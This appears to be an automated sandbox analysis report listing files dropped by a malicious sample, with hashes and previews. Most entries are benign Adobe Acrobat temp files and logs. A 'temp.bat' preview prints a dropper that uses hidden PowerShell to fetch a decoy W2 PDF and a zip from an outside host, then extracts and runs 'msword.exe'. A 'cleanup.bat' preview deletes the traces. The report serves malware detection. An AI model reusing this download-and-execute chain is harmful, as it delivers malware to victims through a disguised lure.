Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nilrxets.ldj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2e2nmwi.csi.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91rghpos_1veejeg_5s0.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
Category:	dropped
Size (bytes):	144514
Entropy (8bit):	7.992637131260696
Encrypted:	true
SSDEEP:	3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
MD5:	BA1716D4FB435DA6C47CE77E3667E6A8
SHA1:	AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
SHA-256:	AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
SHA-512:	65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
Malicious:	false
Preview:	PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..\|....,.A.....Z..a<.C._..../G\|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.\|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r\|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?\|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9hx02v0_1veejei_5s0.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
Category:	dropped
Size (bytes):	144514
Entropy (8bit):	7.992637131260696
Encrypted:	true
SSDEEP:	3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
MD5:	BA1716D4FB435DA6C47CE77E3667E6A8
SHA1:	AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
SHA-256:	AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
SHA-512:	65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
Malicious:	false
Preview:	PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..\|....,.A.....Z..a<.C._..../G\|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.\|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r\|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?\|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-04 21-03-02-260.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.345946398610936
Encrypted:	false
SSDEEP:	384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
MD5:	8947C10F5AB6CFFFAE64BCA79B5A0BE3
SHA1:	70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
SHA-256:	4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
SHA-512:	B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
Malicious:	false
Preview:	SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.373007986030689
Encrypted:	false
SSDEEP:	384:LND2f2C2n272+2y22K292l2O2JN2r2QnCnL7g666o6qizi7DYDXDCEbobEbyJ+Jb:a9X
MD5:	45A3D2FEC6FA6BB12D7319444BFEAEBF
SHA1:	98399BAD5C28E63B03253EC5145EFC0DBE85AB4A
SHA-256:	372CB3023AD33C87268F70EF574A7F67BBCB362968EC468D12F6F6D4490461E2
SHA-512:	5E7304DCFBCB40372D188B6838826F3A6755F4548904DF17A1AEF22607A277A9B7499AA4A5C92CEBE993D3224BCD0EE07B98F18D6F5E8A9092DAB76C8B0A9A81
Malicious:	false
Preview:	SessionID=c6195d87-9f9c-449a-9a67-188ad224fecb.1736042582273 Timestamp=2025-01-04T21:03:02:273-0500 ThreadID=7596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=c6195d87-9f9c-449a-9a67-188ad224fecb.1736042582273 Timestamp=2025-01-04T21:03:02:274-0500 ThreadID=7596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=c6195d87-9f9c-449a-9a67-188ad224fecb.1736042582273 Timestamp=2025-01-04T21:03:02:274-0500 ThreadID=7596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=c6195d87-9f9c-449a-9a67-188ad224fecb.1736042582273 Timestamp=2025-01-04T21:03:02:274-0500 ThreadID=7596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=c6195d87-9f9c-449a-9a67-188ad224fecb.1736042582273 Timestamp=2025-01-04T21:03:02:274-0500 ThreadID=7596 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29752
Entropy (8bit):	5.383212961126267
Encrypted:	false
SSDEEP:	768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rT:e7E
MD5:	F469881628874C07354B0E8FA8EBA08D
SHA1:	97C62517CF850A77CF0DDE2DB9057F4D48138AD3
SHA-256:	74A36108B9AF8566425AFAD13A27AB3820D0926C2C51BD0C47396040824FD60E
SHA-512:	A113821124F2B6DCB01001133B3E5B58D38AB2FC7F519503FBC72E93E19135AF002F8E74BABE41EF5DD7E272E967F8B81A1934C80F3D16924B52F350D189C2E5
Malicious:	false
Preview:	03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : *************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***********************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\42c798b5-0e41-4ba4-b0e9-0440b83fec03.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/gWL07oXGZIZwYIGNPJwdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:4WLxXGZIZwZGM3mlind9i4ufFXpAXkru
MD5:	AAAAB43627E96B02BC54A78F0EE8E32C
SHA1:	03808205C51BA031BF69F0DF07C9C80835098104
SHA-256:	B9ED5860C1528CAE5717E553381762D9C4ED093E546F7500F55B6B18B5C20CEA
SHA-512:	A476038C2BC9573AFA12D831678C0D2A6EFF0C1E065F7D214A0D5684E79AA7F02710DF30524DE0E6EC90CB660E581531DFA57F038EE1BC285B9BC3DAE17D133D
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\65b673c5-d087-4e28-a370-168e7669b55a.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 634912
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/xbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07EGZftwYIGNPzWL07oW:Jb3mlind9i4ufFXpAXkrfUs0wGZVwZGf
MD5:	0E1B199E77ACA01686FEB4EAEF72E148
SHA1:	7C22D506ABC4B734E9491A833F78CBB2549356D7
SHA-256:	46896E7C24B491E55815328A77A1F3FF6E9CBD6DAEFCD172F026B53320F934DE
SHA-512:	EFEEDED8F81C340876293C5A63B3F1BEED952659B2DACCCC3ADD9868F6D6782484B29BE6720FD7F8E32B0A5CFF5C08CC31C2252A9AE20F0692A935AF0C263664
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\af341d60-20bd-4be8-bdfd-53421459e907.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\acrocef_low\df626de5-92de-4abc-bdb9-83df86b1c39f.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\cleanup.bat

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	170
Entropy (8bit):	4.821837976420847
Encrypted:	false
SSDEEP:	3:mKDDCMN2RuXcov2lOt+kiE2J5xAIhMS2Lr5+Vovu9LsB8SAlOt+kiE2J5xAIziQp:hWK2vo+cwkn23fhnKdqo29LiXwkn23fZ
MD5:	6EF1EF813A19AE723C47C634175686F6
SHA1:	08B33DB9B60397E1FCE1401623525961AD93D3CF
SHA-256:	EE1ED5C1D79613338208C48665A128B7C49CEAD655C8235E6ADED6DD053E0350
SHA-512:	38A81019CF124C80D48264E0AD0F89179F819684017F138A3F487FB7010D8DD736E289CFD21996C7D02CFA623C10FCA04BDB63F3BD4772D21860B8D5BA640284
Malicious:	false
Preview:	@echo off..timeout /t 10 >nul..del "C:\Users\user\AppData\Local\Temp\temp.bat"..del msword.zip..del downloaded.hta..del "C:\Users\user\AppData\Local\Temp\cleanup.bat"..

C:\Users\user\AppData\Local\Temp\msword.zip

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3511922
Entropy (8bit):	6.32262550846943
Encrypted:	false
SSDEEP:	49152:BZH8MW3UdWJhVmT6CpvDjgYDlw0kr1LKEKNoCo:/H8ZZvVopvgYD/kJLKEqu
MD5:	EF2620F66230219A51A6C2055066C3C3
SHA1:	394657C478086158830BE943C09630488BE56366
SHA-256:	B9C27330ED8EAE02A918901435A2D1F98EE20CB2390D9F69FC45A043F2009A5B
SHA-512:	C20357671E243AAD4A68251A6C49EC9BD69FBFBEF104BD73CA6903003D558159C2B5417924CC6228FBB5A8750FE3F24246C8A7686A823E27E7DB80EAE351023A
Malicious:	true
Preview:	PK...........Y'4....5...@.....msword.exe..\|..?>.#..6...F........K\...!.....%@-..J-.f.[.I'k..UD.....-m.W{..+b....6...b.H...u.......9....{...z......d...y...g...7.6A..H.!.....+.....F]..Q.K#.4...O.o..^S.j.w.....)..7...r.w..V.-....[.%.......f...w.......s..\.;uf!/.>.7.....#...v.{.....oI./.S.'..,....o...V.HK. .x..%.s.....B.H-.f..9...._.o..9../A.7..R......... ..)......+x/MM@f.Cxr....o#.m.....w...=.Z0......`.i.W\|S.. .[&.k........4...l...&p....S..i.f.....:....5P..kV..y.'.A...W_n.yW..hxPD......_m7W....W...>.o.Z...2...}.J.Z]...^.x..U....2...8..G6y....A.....P...6.x.FT.w.......3.D.^.R.J.....aJ.[.W.a....\.g.....24.K\|..........+.C..~fkG..Gq.6.v#..& ..s...G..0...h..QT..T_...h&DN..i@d(..~.....L\|.^.0.....]...F...B.X....QK..w...;}...(....vQ.(.m#.K.....qP*A....\..1...3:Q.....s(_...v....A_Pjo..>.w..W....6.c`.U..#........]S..}.n..WZ.A.1.n.m..........v.%I.@.K.....7.....ZqU.u1.X..eKw.i.kj....O...w.P+.I..............;.<.w.V..)....6...b....Z.....V....E..L.h..6.78

C:\Users\user\AppData\Local\Temp\msword\msword.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	524295939
Entropy (8bit):	4.230594067417474
Encrypted:	false
SSDEEP:
MD5:	6BCF42715FD1768FE1013C702612D0EE
SHA1:	D7AFFE603F5D7BBCA046AA4AB26BFA458C30C348
SHA-256:	71A2295583DB11053AC6D0A6770199352BC2F549212548D362E56258EE1CDD50
SHA-512:	E749B377C6B19BF8FC42C06FEF9A81024E66B190439260F7A7474EEED8A78E2FA2EA56614ACEB37110AC4ABA2772FDB144965CF99E091EFB39D444DAA2DA839F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................p......r.....@.................................@...........BU............@......`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...BU.......V..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\temp.bat

Download File

Process:	C:\Windows\SysWOW64\mshta.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	498
Entropy (8bit):	5.198499125177484
Encrypted:	false
SSDEEP:	12:wmDU081kkGrAOtD0OO081kkGVX5OQ981kvYX53RP:wmD7RrAO90OxRxUkvYX53RP
MD5:	E8DFDB915A523A09E139AAA900991DDD
SHA1:	D23F4798C549BFB7DDD968C4C2A971F67468A662
SHA-256:	91619737B3F7AF4623DC62B4F3DF7B551337EC94F693A3B9BA35BB231483393E
SHA-512:	B4E737D1C80420688BF856DF02A580B691D120307B7D31EA4766448CCD0C6EEC7B2C48424691E92DFFBA58CA8C9A8DF989F5B683D9363CAC37D3DD3E5AD1623E
Malicious:	true
Preview:	@echo off..set url=https://myguyapp.com/msword.zip..set url2=https://myguyapp.com/W2.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url2% -OutFile %USERPROFILE%\Downloads\W2.pdf"..cd %USERPROFILE%\Downloads..start W2.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url% -OutFile %temp%\msword.zip"..powershell -WindowStyle Hidden -Command "Expand-Archive -Path %temp%\msword.zip -DestinationPath %temp%\msword -Force"..cd %temp%\msword..start msword.exe

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	98682
Entropy (8bit):	6.445287254681573
Encrypted:	false
SSDEEP:	1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
MD5:	7113425405A05E110DC458BBF93F608A
SHA1:	88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
SHA-256:	7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
SHA-512:	6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
Malicious:	false
Preview:	0...u0...\...0....H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...\|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210

C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	737
Entropy (8bit):	7.501268097735403
Encrypted:	false
